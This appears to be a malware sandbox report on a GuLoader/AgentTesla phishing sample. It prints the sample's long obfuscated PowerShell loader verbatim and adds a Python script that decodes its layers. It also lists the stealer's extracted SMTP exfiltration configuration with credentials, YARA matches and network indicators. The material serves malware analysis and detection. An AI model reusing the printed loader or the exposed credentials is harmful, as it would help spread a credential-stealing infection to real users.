P2Ko3Ko0PeFBo0 S9Re0Dr0Op0TrBEm1 UANi0FaCFa0PrB T0 H2So0St9 a0Me0Co0De7 T0 F0Go0 U9No5GoCRu5DeAwa5 EEMi0 HBse1guDRe1RoCNo0Va9Kl0BdB D0Ne2La1WhDOo0PlBBo4Sk0In2 SD J1PuCPr0 HBTu0FuFSa1 EABr0 HBIn3ReABr1 F7Be1CyEDa0PiBLe4Lo6 D4 N7Pe'Ph; M&Oc(st`$HyS PaOkwSaw BoStrElkGdeBar S8 D5Ka7Sw) R Kv`$kiL IoelgtroOrpCoaMoeSudPoiBicOusEn5 P E St No;Bo} R`$GlM EaMen eiMocBauChrBliHysNot C Po=Fi HiP EyToxSyiUndUneHoscl4Ch Fa'ra0Si5Ve0LiBSu1FrC S0na0ma0 UBAb0Mi2 D5 EDRe5 TCOc'Bi;Pl`$PaXFoe Bn Uo TlTgiInt UhTesEm Fo=Ur RaPMeyChxPri CdAkeFysBr4Di Sn'Im1 UBRe1AdDDe0LiBMy1AlC B5hjDPr5veCEf'La;Li`$MaNThodknUneBlxByptulAsoPas HiDevKae MsEl0Ln3Py To=St AkPTey TxShi OdJieBasTi4He Re'Us2Sk9In0LiB c1FeAFa2TeD H0je1sk0La0Ko1CoDBr0Re1Ta0 S2Re0FiBUn3Mi9 S0Re7Ka0Ud0Co0BoASt0In1Be1Da9Se'Ca;fr`$VaN Io SnCoe PxUnpNelAvoDisGii EvUneStsHo0br0 k=AsPStyJoxAniBld HeResPe4 O U'Lu3fuD S0ge6Po0Rt1Mi1Tu9Wa3Se9Ud0Om7Li0 C0Di0 mABi0ve1Sk1St9Ba'Ha;Sn`$ArL QoligTroGrpAnatieBhdFriSkcKusUr6In Ch=Pe SpPObyMaxBiiNed BeCasBe4Op Ta'Ha4 AABl2He3My0 RFPi0Ro9 P0wa0Sk0NoBDh1coAki0 UCNo0JoBSl0 E2fo0Co9 S0Ap0Re0Bl7Sk0Is0Pl0Bi9Fr5ReCre5 AACo5SwEPh0frBUd1 OAWh1Gr8St0 D7Th1Gr8Be0Do2 H0WoB A0BrAUn0 EBSe4JaEMy5Af3Ov4OpEGa3Gu5 B3UnDSa1Ho7La1OuDFo1UnATy0NeBFa0 B3st4Fl0ut3AnCDi1CaBNo0Tr0 R1PhATu0No7Ar0Pi3Ha0FrBFo4Do0Br2Ap7Va0 U0Ni1 PASe0InBSt1SeCum0ko1Su1 aEEr3 EDFu0 MBKr1MoCSk1Fa8En0Sa7Ve0TrDVa0MaBVe1BiDSe4ge0Xe2Or3Ta0LaFoc1StCLi1AgDHn0Pr6 M0epFMi0Sa2eu3Wi3 D5Tr4Po5El4Ev2 
I9Ko0jeBOu1PrAIn2TeAEn0BeBDi0 O2Ce0MeBAs0si9 T0StF B1DeAPa0ScBla2Tr8De0 I1 J1HuC F2 P8Sh1FlBTe0Sl0 U0 HDPa1 tAVi0 C7Pu0Eg1Pt0Pe0Pr3BuE D0Sc1Di0No7Fo0 G0Su1byAEp0ReBPe1HoCPa4 M6Su4Ut6Tr0Di8au0 A5 M1ViEDe4TiEOv4BuA B2Un3 H0UdF P0Bo0St0Di7 g0ooDNa1 HBTi1 ECSa0Eu7Hu1 IDSi1 LARo4WrERi4OvAue3HoDEv0VeFSp1Tu9 d1Ci9Er0Be1Af1FrCTe0Sn5 P0CrBWi1MoC N5 R6Ov5DrB R5 EA Y4 F7Ga4 D2 E4KuENo4 P6 M2 C9Ra2NoA S3PaA s4 UEMi2ElE P4 D6To3 H5Co2st7Re0So0Li1GeA I3OvEUd1SeAGr1 pCGa3Sp3va4It2Im4skESk3Pu5 P3 FBRe2De7Fo0Re0Om1BoAFu5KlDSy5EnCBa3Ov3Su4mu2 f4PaE G3fy5fa3buB A2Fo7Tr0Cr0 K1HeAar5EpDOv5TiC D3Un3Tr4Fr2Rg4 SERe3Ex5Sw3VoBTi2Vi7Fo0 X0La1FrATe5UnDTo5FlCAc3Pe3Se4At7 T4MeE S4Re6Vr3Re5Af2 P7ma0 O0 P1VeANo3quEGe1MiAIn1NaCMa3No3 A4 M7 K4Sm7 V4 I7My'Me;Am& R(Ro`$OrSEnaAdwPrw Io KrSukZoe HrUn8fi5Ph7 E)Do Al`$RoL SoGegSooScpLoaKiegrdRaiRycPlsOm6 P;Ka`$BaNAaoBen CeAlxsupFll WoArsTriudvMue Us T0An1Ru Sa=Pr SuPBeyCox Si hd veHesMa4Sa B'Da4 PA U2BeB O0 S8Re0 G1Pr0St2ce0 U7Kr0Is1ln1PhDfl0PlB R4skEBy5Je3Sc4TrEAe3By5Le3BaD F1ch7De1 VDBi1VeApn0ReBGa0Pa3Al4Em0 C3 MCHe1DoB b0Sp0Br1 oACe0ph7Ta0Ex3Su0BlBRu4Ro0Re2 R7Fo0Ma0Ro1HeABe0 WBou1UfC S0Af1 M1ChENo3InDUn0LuBBl1opCNo1ph8Sp0Mo7Sk0ToDRo0SkBSk1AlDUd4Ru0Se2Ce3Va0DaF L1maC S1 SD A0Pa6Po0TaFin0Ov2 K3 G3 I5Pe4 O5 S4 T2Bl9Ke0UlBPr1RiADi2BaAEt0 CBUn0De2 B0 UBHy0Ve9Na0 SFTi1OvASk0 KBVi2Fl8El0Pr1Wi1ReCBr2La8Ma1DoBTr0Pe0Ov0RaDSt1IwABa0Un7Cu0Mu1Tr0Ta0 M3 AETa0re1Nr0 A7Ru0Ba0Wo1 sA C0 FBFo1KnC B4Ac6Wa4Su6Dd0 j8Ph0Ho5Bl1BlESp4SpEOv4taAov3Ho6Be0HrBAn0Mi0 i0Di1Gr0Us2Vi0Ma7Fr1 AAPl0Ho6Af1AmDIn4 MEEk4ReA o2Pr0 R0Mi1pi0Fl0kr0CrBUb1 U6En1UnE I0Kr2un0Sy1Fe1 KDSh0Ra7 N1Sk8 S0GrBMa1ApDEn5MaERn5ReEYo4Sc7Un4St2Gr4SaE H4Sa6Tr2Tr9Co2 BAMo3PlAMa4FeE S2 AE R4 J6He3To5Be2Fr7Xe0Br0Pa1 PAmo3InEZe1UnA E1buC N3Sl3 d4In2Wa4DoEGe3As5Fa3 hBCo2Bl7Ci0Di0Fa1GaARe5SpDOp5ToCAn3Cr3Ni4Op7Bn4 NECy4Si6Sc3Jo5Ca2An7Cl0 A0An1NdA M3OpEIn1 RAGl1udC M3 c3Re4Ar7Ga4pr7 p4 T7Op'Ca;Sl&Sk( P`$JiSRhaSiwJowSeo Cr FkFaeJerHe8In5Te7En)Te No`$RdN ao UnOrePrx ApSalStoWosSliLavhue Os L0 R1Op;St`$LaNTyo 
BnJeeEnxUnpAslEro Cs LiBivTreSjs T0 C2 E Ek=Ko UpPGayTixKoiNodLaeArs k4Ga Pr'Sa4ReA F3BeDFo0ScBKn0sh3Te0Gu7ef0Pl0Of0JaFGa1anA r0Gi7Ra0Un1Fr0Th0 S4AkEDu5Ar3An4RaEDe3Na5Sa3 VDFo1 A7Ce1LuDFi1LaARg0UaBAt0 J3br4 B0 S3paCSa1PaBDa0 S0Un1KaA T0Tr7Ta0Un3 P0noBLa4Je0tu2Sk7Pr0Un0Op1TiABh0GoBTe1PeCPa0Fo1Af1arE B3NuDPh0WaBTo1ThCBa1ve8Af0Ey7Ac0 UDAt0NoBZe1 MDBa4 S0om2Ud3Fl0LoFin1blCRe1KiDSt0Ae6Sk0 AF O0Dr2 T3 A3Dr5Pl4 F5Mi4Pr2Ri9Dm0ArBUd1inADe2UnAUp0 HBfi0Co2 U0DaBAf0Cr9Ua0ImFHy1BaAfl0PiBPa2Fl8Ru0Sc1Fa1DiCLd2Ep8 S1AnBUn0Lo0Es0AtDSa1FlA S0 K7Di0Or1 P0Se0Zo3CiEAm0Ud1 B0 U7Lt0Pn0 S1TiAMo0unBWa1PaCho4Ad6Ef4Re6Ch0Sl8So0 F5 S1blEOc4 oE P4NoAIn2In3 F0tuFEn0Lu0Ev0Di7Tr0UfDCo1UnBMe1KeCPr0Sp7 P1FdD R1 NA D4FoEUd4SaAca2Sp0 K0Fe1 F0Un0Bl0HyBAd1 C6Up1 BEfr0gr2Hy0 F1 S1EnD e0Tr7Ha1Di8 S0FoBYo1enDSt5SlE K5BoDSp4La7Ub4En2De4SpESp4ne6 M2 U9 u2laADe3CaAel4KrEKa2ChEUn4No6En3 S5Pa2kl7Gl0Sc0Te1 VAPo3 CESa1 SAIm1BaCRe3Ca3Li4 T7 F4EnEEp4Ho6Be3Un5Ve2Be7Fo0Be0Fr1BeARa3SpESl1EcAUn1ErC i3Sp3Va4Fo7 O4St7 T4Bi7de'ef; B&Wa(Pa`$ DSIma pw SwMeoPhrFokkoe IrLu8Pa5Pa7Bo)Mo a`$ dN IoAfn BeChxTopNolUnoBrsBaiRevRueSlsGo0Ca2In;pr`$IcLSeo WgaaoTepSea Aealdsoipoctos F7Sn Ud=Pa SlPReyFoxOmiEndDie Ps M4Ha U'sk4ElA N2Hu3Gr0Co7Ge0CoASt1DyAKo1BaEAp1foBSl0 S0Pl0 C5Fl1MoAAs1ToDBa0Je4 F1SiBLr1KrDAn1NoALi0UpBKl1SmCAf0fa7 M0 S0Ji0St9Fl4DeE V5De3Or4CoEMe4UnA A3OvDIn0CuBGa0Ch3 P0 F7Pr0 A0As0 TFKi1 AAAm0Sh7Sc0Km1Sy0Op0ko4 S0 R2gh7Un0 M0Fe1 P8Bo0La1Ch0Br5Fo0MoBCa4 L6Di5WaERe4Ha7Me'Th;Fa& V(An`$HySAcaSowStwAcoImr HkCoe HrMo8Va5 E7 L)La Fo`$PrL BoBegCoosapDya Re BdGai rcChs S7Bo;Tv`$NoLImoDjgSpoTip BacoeModVei LcunsCo7Hi Da=sp UnP IyPaxKuiBudGueFlsJa4St Po' S4UnAPo2LaBse0Bl8Fe0Rr1Sl0Ko2 B0Gl7La0Je1Sp1ReDMe0RiB w4 S0Fo2Po7 R0Rh0Bo1Ma8 E0 l1An0 K5 U0raBGa4Fl6Sp4DyAAm2Fl3St0Si7Be0FiABi1JoASh1StESe1SkBSu0Br0Er0Sk5Kl1MoA D1myDCa0Bi4Mo1SiBkr1TiDPr1SjA R0WoBAd1 NCHe0Fe7St0Ov0Ba0ce9An4Im2Ne4 UEHi5unECa4Al7Fo'It;Sa&Lo(Ka`$OrSEkaStwKrwCooJerStkVaeSprAf8 r5 S7Br) z ja`$InLHyo BgSioKupSyaBeePodPoiVacAasCh7Fe;Sp`$DeOBeuPrdEpeVem DiYnaManOx Co= F 
pafBrk Fp B Ra`$ZiSpra RwEvwMaoBirPrkSue Fr K8He5Se5 T Ma`$LoSHya GwFawFooCarTik SeInrFr8Yn5St6up;Pr`$ ALGroUngyaoOppSoa PeundSuiBucInsBl7 C un=Si FyPBoyEmxsaibadUdeVasOr4Bi ac' H4UdABo3 M9Di0Pr7Ch0 m0Se1HkASt0HvBph1UdCSa1At9 N0BaBSu0SaBGa0trAre5 UADi5OrDLy4PoEVa5Re3Sa4NoEEj4DyATt2Hy3To0WiF M0Co9Ns0 I0Me0UnBFa1 UARe0MaCRe0KnBRy0No2 C0 D9Bu0Na0Fi0Th7Pa0 R0Ex0 P9 A5LnCEf5PrARa5WoEMa0CoB A1beA l1Ou8Ch0 M7Zo1 K8Be0Ha2 U0ChBSe0HjAEn0ReBFi4Ep0Om2 G7Da0Ki0Ca1Xx8Gr0Fu1 S0ge5Hu0 DBHj4Uf6Fl5NeEso4Sp2 R4SkE A5 b8Ur5MiDRe5Ke7Me4Si2 E4AkEFa5VeETr1St6Sa5 ADCr5SiEDe5TyEKa5SlEEd4Sv2Re4PtEUn5 u8 C5LeAFo4Sp7 P'Pa;Sp& S(Ap`$SlSBeaEmwtiwAioEwrSvk SeSarsn8bi5 M7Ka)li Xi`$ TL Mo HgWooSupPraKoeKod NiRecAusHk7Le;Pe`$UkL So AgunoTopFoaIde FdEviBrcSksAk8Om a=Va rePFoy BxPai Td Ce DsBe4Fe Pr'dr4SoAGe3iaD P0An5 B1ChBDe1BlEFr1SpDKn0Ce6lu1UnAId0 F7Sa0Wh0Ma0reFco4SvEWa5Mo3 B4FoENo4GeAZa2Ud3 E0lnFSy0Pa9Me0ru0An0RoBLe1laAco0 IC R0 tBGl0 B2Pr0Wh9 K0 S0bi0Ge7Co0 S0Un0Se9He5 AC S5TaASt5KoEPo0drBhj1unAJa1Pr8Tr0Va7 A1 e8bl0Fl2 S0NiBCr0brALu0StBAr4ap0Gt2Sk7Am0 B0He1Sp8Ur0Cl1 B0Ba5Pl0ChBDa4ut6Ta5DeEOv4Sl2 h4StEDa5MaBTr5 MBPe5BaBFo5TrCUn5EnB B5CaDNe5Re9 P5Er8Tm4Li2We4ChEta5 MESt1pe6Le5KoD K5toETo5HeEPo5 DEBr4 T2Pu4 CESm5 HA K4Ov7Gr'Fh;By&Ci(St`$PiSNoaMiw HwMooKor MkNeePrrMi8 A5 S7Ke) P Al`$OpLVeoJogUnoDapFjaCheSudErifocGrsEn8St;St`$ LWEfi WnFotPleGrr Hw Ie HeBidDe4be2Wi=Ma`"""Re`$vaeAqnPovSu: BLfeOShC BASnLPaABrPfaPDiD fAUdTGaAAr\ EbNilSeiPinAld NsPrmByaSag SnFei PnUdgCre Unvl\FrNLaoGrnAnpFar Bo Fc AuBerPleBom Ce GnMatRe\sas Ga Jr BaEmwDea NkNoeOvsFre A.PrdNer Dira`"""Da; d`$chLPooPigDeoKipEtaGaeIndumiEvcGrsPo9An Il=Vo FoP CyTox SiUnd PeFosKt4De Sp'In4FlARe2 G2Ti0De1 R0 N9 S0Sm1 E1SpEin0OxF K0VeBIn0MaA P0ro7Un0ReDAn1SeDWa4 LEPa5Ko3He4 LESl3Ni5 m3FoDSa1 L7Sp1XoDDy1KoABr0PrBEm0ho3 H4Gi0Un2Ac7Sk2Re1Ka4Ul0Sk2Ad8 L0Om7Ug0Pr2Re0BuBBr3Vi3Ab5Sk4Ga5Ba4Ag3StCFd0BeBAd0UnFSk0NoA T2 UFTo0Er2 T0Sk2Me2VrCTr1 P7 S1StAPr0DeB U1SiDPa4 E6Gr4CoAAt3Te9 D0He7Pa0Im0Ki1AfAUn0PiBOv1GaCGe1Fl9 T0LaBbe0 SBBa0PhAWi5 WASy5 SCma4 
o7Ri'Wi;Pa&Br(Li`$PrSDaaDawGrwNaoHarBokMieNorPh8Ne5Gp7Ad) C Mi`$NiLBaoRagBioChpSea Pephd AiHjcbusBr9Ap;Ti`$SoDDeiRhsFll iognaLidPr0Fo Co=Ov VlPDeyMaxTeiBodVie CsMa4Hj S' O3Sc5Re3MeD R1Pe7Un1DuDTo1 FABe0 SBmo0Ko3To4Ml0Me3RaCBy1ReBKo0Hy0Gy1UlASp0No7Di0Th3Lo0DoB P4Sa0St2Et7Ko0Ph0Fj1 cARe0AfBKi1SqCBu0 R1Sp1MiE F3 DDSt0 IBFa1 RCFo1Ma8Fr0 s7Op0StDBe0HeB H1AnDco4Fa0 K2Ti3Se0 FFUd1SlC S1PaDRh0My6Sc0DrFFo0Br2fu3 S3Zi5Ta4Pa5 U4Pr2EtDOv0 O1An1MeEVa1bl7Ou4 C6 T4NeAUd2co2Ap0 T1Un0 L9Ke0Ph1 u1QuETr0 EF S0 CBMe0OpATr0Fr7Be0TaDBi1TeDDo4Tr2 l4CoE G5EnApl5 KEBl5FrCNo5JuA u4 H2As4 ME S4FlEKe4EtAPr3Sc9Ce0 T7Fe0Mo0Un1DiASu0UtBLa1MaCOp1Ch9Me0EvBFo0 VBUf0ChARe5 HAFo5TeDFn4Ru2va4TeEsu5Sk8Tr5SuD U5Br7od4To7Or'Sl;Fa&Fu(Pr`$AnSPiaOpwprwSeoTorSekSoeSprsu8 B5Po7Sk)my Di`$PaDHoiFesDolLaoAmaVodFo0Sp; B`$StP SokrsVeiTntLnisvoKmnEne ArNe=La`$SoLVaoFagChoFop MaSeeUndUniSicNosar.TmcphoBauMonGrtAf-Pr6Le3No9 H-Se4Un0bl2Po4 A;Sa`$ ADAsiBrs PlNoo TaTrdMo1Si Sv=Re InP uydixTiiAfdTaeGosGr4Sk Re'Au3Ju5ta3SkDSt1be7De1teD b1DvAOp0CrB I0Ku3 N4Ti0Ke3 lC v1KoBKi0In0Ta1PeAfu0Ov7Pl0bl3Fl0 ZBre4 F0In2Ne7Ar0pa0 A1PhAVo0WyBSp1ReCSk0In1Au1 SEDo3UnDKl0BoBOp1UdCFo1Ut8 G0of7Co0 CDSt0GeBSk1SyDRu4Os0Gt2Th3Di0krFAl1DeCRi1LaD A0 F6 S0 hFSk0No2 U3Da3Ze5Po4Bi5La4 O2TeD D0Aa1 R1JeE U1Bo7 D4Ba6Bl4EmAPa2 N2 T0Bu1 E0Ab9Pr0In1 N1meE P0 PFdr0PhB S0GlATr0 M7Fl0MoDMa1 RDRe4Vi2Fl4BoELr5Ku8Sv5InDPl5Un7 E4To5no5 HAVa5AsEJo5 ACFu5EsACh4Cy2Wh4saE S4TrA S3 CDDr0Fu5Va1IsBMi1NoEPr1MiDOp0 A6Ma1BlAMo0Sy7De0Su0Hy0 TF H4Fa2De4BnEPl4UdATa3VuEUd0Re1Or1BrDCo0tr7Sp1DeAIn0An7Fa0Me1ov0Ek0 E0OrBGa1JuC B4Hl7Le'se; R&Fi(Le`$ HSEua MwChwReo JrStkBaeParDi8Gr5Pe7Ar)Sp Eu`$miDapiPls Bl PoyoaMedis1Un;Da`$CaDSaiDisDelGlo naPad O2 N w=Op TrPDeyFuxCai EdTreFusCo4 d Cy'Fo4StASt3ExD P1StA A0ShBJa0GeF S0UnApo1udD N4WaEDe5Sy3Ta4arEOb3 W5Es3BeD Y1 e7In1BuDCh1SuABe0trBVi0fr3Bo4Ox0Re3 KCSy1 TB B0In0 F1noAUn0Si7He0Di3Tu0SeBIm4br0Sk2 g7Da0Pr0Pe1ToAru0 BBVa1HaC M0Vi1Ma1CoEUn3HaDCe0PhBYt1GuC B1Cl8Co0Te7St0TrDJa0FiB T1SaD F4 F0 P2Ba3Le0InFAr1HuCEx1ImDOp0No6 
U0OsFMa0Pe2He3Fl3Li5De4 O5Os4Sp2Fo9Al0RaB B1TiASk2 SADr0 TBSl0 s2No0AaBSa0en9De0StFFo1 KARe0OeBph2He8as0Sm1Kr1SiCQu2gr8Po1FaBbe0 P0Li0 ADRi1PoA A0ju7ev0Va1Sp0Ru0Gl3 FEPr0Mi1Sc0La7Al0Tu0Gi1AnACi0VoB C1 FC A4Re6ch4 S6Tr0Su8Kv0Co5St1SyEGo4GrENo4KaACr2pr0Sp0Zy1Ab1CoB N0Na3Pi0LiBEf0Le0Gr0Ut7Vi1BeDpr0 O3Pe4FlEOp4FrA F2blAko0Ch7 D0Tr3St0Un7An0in0Vg1FyB D1 HAMe0 L7Am1Do8In0 SBPn1BuCMa0Ko0Ic0MuBRa4Gu7Fa4Vv2Ac4 kE N4Vi6Fa2 I9Am2DeAWe3SoAob4 VEJo2EnEsk4An6Vo3Co5Un2Ho7Me0Ga0Sy1 BAOe3KuESm1 BAWa1DoCIn3to3Ro4 S2 T4HoEFo3 D5 S2Di7Pr0In0Fo1NaASt3AaEFi1NoABa1SuCUn3 F3Pl4 a2Ar4peEfi3Kl5Co2 T7Re0Bi0In1DoAch3BaESl1 SAOu1 DC T3Su3Pu4Tr2An4PaEch3Cy5 B2Di7Kn0Re0To1teAre3AuELi1StA T1SlCFa3 J3Dm4Ga2Un4 UESe3Pr5 F2 C7 K0My0Ho1BuAPe3 HEUh1 HABe1 HC H3 s3Ch4Mi7Ov4ExEFo4Hn6Un3 S5Co2Sv7 M0St0Ca1ToAPe3ovEOm1 SA T1AfCBo3 S3Pe4Gl7Ne4Ga7Kv4St7Un' I;Ri&De( U`$BrSInaBlwPrwVaoVar Uk UeSjrKk8 R5 B7He) M Ch`$VeDStiBls Ml BounaAwdOp2Nr; A`$ CDChiSusNolStoTaaAkdRe3Fo Ub=ci NePLeyTix Ei SdTieThs N4Al Ka' I4 sA S3OvDTr1 LAHy0KeBUn0UnF T0PrA N1StDSt4Si0At2 Y7Sy0Kv0 S1Te8Un0Bi1Py0La5Cu0SyBBi4 P6bl4TrA P3 S9Ra0As7Kr0 o0 W1InAWe0DeBHa1toC B1Ph9Mo0ByBVo0MaBWh0PrARe5FlASt5GeDTr4Ra2Sm4FoAAa3ElDIc0Bu5Tr1 MBki1SoESl1 HDLa0Ny6Sa1EmAca0 S7 L0La0Dy0BjFRu4Ok2Aa4 MAPr2Kn1De1NiBSt0 RA A0StBUr0Me3 S0pr7Re0AfFSa0no0Ma4Un2Tr5 LESp4In2Bu5UpE R4Qu7 T'Th;Ba&Po( O`$ PSHaa AwTewBaoBirFikOceUdrru8Kl5Ho7 B)Br Ma`$StDAdiInsEtlCaoReaModSk3Af#Wi;""";<#Mageskifterne Tarwood Setiferous Stokvrker skillevej Saudiere #>;;function xorami ($Indbyggedes,$Magnetbelgning240) { &$Flagellanten0 (Disload9 'Fl$TeIabnInd CbPeyUngangMeeSkdPaeAgsHa B-RebhaxTeoderBa Tr$ UMsuaUng snAceCht PbTeeSilMeg Jn MiTanVegMi2Do4 T0Af ');}Function Disload9 { param([String]$Solfald); <#hovedpunkts Restemad Cataloguing Reseeking Commonality celebrating Sportsdirektr #>; For($Nonexpectant=2; $Nonexpectant -lt $Solfald.Length-1; $Nonexpectant+=(2+1+(1-1))){ <#Konditoris Endestation Kolhozy Ataghans Vinkortets #>; $Nonexplosives+=$Solfald.Substring($Nonexpectant, 1)} 
$Nonexplosives;};;$Flagellanten0 = Disload9 'ReIBuE aX B ';$Flagellanten1= Disload9 $Portugals;&$Flagellanten0 $Flagellanten1;<#Temperaturmaalingen Randingerne Kdvarerne Punditries Afkrslen Mocambiquernes Galleriets #>; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • MSBuild.exe (PID: 7348 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
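The PowerShell command line of PID 7224 carries two decoding layers that can be re-implemented offline. Disload9, visible in clear text at the end of the command line, keeps every third character starting at index 2 (the loop starts at 2, steps by 3 and stops while the index is below Length-1); applied to 'ReIBuE aX B ' it yields IEX, and applied to the contents of $Portugals (after resolving PowerShell's `$ escapes, which the obfuscator's stride does not count) it yields the second-stage script, which opens with `;Function Pyxides4 { param([String]$Solfald); $Northumberland = $Solfald.Length; ...`. Pyxides4 is the second layer: it reads its argument as hex byte pairs and XORs each byte with 110 through the xorami helper. The block below is an added example written for this page, not code from the report or from the sample; it keeps the script's own function names so the output can be matched against it, and runs on fragments copied verbatim from the process tree above. Decoding the first two Pyxides4 arguments gives System.dll and Microsoft.Win32.UnsafeNativeMethods, the internal type commonly used by PowerShell loaders to reach GetProcAddress-style APIs without P/Invoke declarations. One caveat: the report renders the command line as HTML, and runs of spaces inside it appear to have been collapsed in places, so fragments further along on this page do not decode cleanly; recover the full script from the on-disk Lection.Fle rather than from this page.

```python
"""Added example for this page (not code from the Joe Sandbox report or from the
sample): re-implementations of the two decoding layers used by the PowerShell
stage, so the strings it builds can be recovered offline.  The sample inputs are
copied verbatim from the process tree above."""
import re

# Inside a PowerShell double-quoted string `$ is an escaped dollar sign; the
# obfuscator's stride counts the in-memory character, so resolve it first.
_BACKTICK_ESCAPE = re.compile(r"`(.)")


def unescape_powershell(text: str) -> str:
    """Resolve PowerShell backtick escapes (only `$ occurs in the fragments here)."""
    return _BACKTICK_ESCAPE.sub(r"\1", text)


def disload9(text: str) -> str:
    """Disload9 as it appears in clear text at the end of the command line:
    keep every third character from index 2, stopping before the last
    character ($i -lt $s.Length-1); the two characters in between are junk."""
    return "".join(text[i] for i in range(2, len(text) - 1, 3))


def pyxides4(hex_text: str, key: int = 110) -> str:
    """Pyxides4 as recovered from the decoded $Portugals script: read the
    argument as hex byte pairs, XOR each byte with 110 (the constant it passes
    to the xorami helper) and return the bytes as ASCII."""
    return bytes(b ^ key for b in bytes.fromhex(hex_text)).decode("ascii")


def decode_disload9_literal(literal: str) -> str:
    """Decode one single-quoted Disload9 argument copied from the script."""
    return disload9(literal.strip("'"))


def decode_pyxides4_literal(literal: str, key: int = 110) -> str:
    """A Pyxides4 argument passes through both layers: Disload9 strips the junk
    characters to leave a hex string, which Pyxides4 then XOR-decodes."""
    return pyxides4(disload9(literal.strip("'")), key)


# --- fragments copied from the PID 7224 command line ---------------------
IEX_LITERAL = "'ReIBuE aX B '"  # $Flagellanten0 = Disload9 '...'
PORTUGALS_HEAD = (  # opening fragment of $Portugals, between the quotes
    "Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{"
    " S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;"
    "bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;"
)
# the first two Pyxides4 arguments ($Estimeringer0 / $Estimeringer1 in the decoded script)
ESTIMERINGER0 = "'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'"
ESTIMERINGER1 = (
    "'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD"
    " K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnB"
    "Ka2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'"
)


def decode_report_fragments() -> dict:
    """Run both layers over the copied fragments and return the plaintexts."""
    return {
        "invoker": decode_disload9_literal(IEX_LITERAL),
        "stage2_head": disload9(unescape_powershell(PORTUGALS_HEAD)),
        "estimeringer0": decode_pyxides4_literal(ESTIMERINGER0),
        "estimeringer1": decode_pyxides4_literal(ESTIMERINGER1),
    }


if __name__ == "__main__":
    for name, value in decode_report_fragments().items():
        print(f"{name}: {value}")
```

The junk characters are letters that happen to include the hex digits A to F, which is why a Pyxides4 argument must go through Disload9 before the hex parse; feeding the raw literal to bytes.fromhex would fail on the first non-hex letter rather than silently decode garbage.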
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Malware Configuration (AgentTesla, extracted from memory):
{"Exfil Mode": "SMTP", "Host": "kalidot@yandex.com", "Username": "<kalidot@yandex.com>", "Password": "quality@qualityaf.com"}
Yara matches on dropped files:
  • Source: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\sarawakese.dri, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
  • Source: C:\Users\user\AppData\Local\Temp\nse6573.tmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security

Yara matches on memory dumps:
  • Source: 00000004.00000002.1604051248.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
  • Source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
  • Source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
  • Source: 00000004.00000002.1607101353.0000000008450000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
  • Source: 00000000.00000002.1728501631.000000000285B000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
  • (4 further memory-dump matches not shown in this export)

                Networking

Source: Network Connection, Author: Joe Security, Data: DestinationIp: 192.185.148.49, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7348, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49710
No Snort rule has matched

                AV Detection

                Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                Source: conhost.exe.5592.3.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "kalidot@yandex.com", "Username": "<kalidot@yandex.com>", "Password": "quality@qualityaf.com"}
                Source: PO_00290292.exeVirustotal: Detection: 15%
                Source: PO_00290292.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: PO_00290292.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
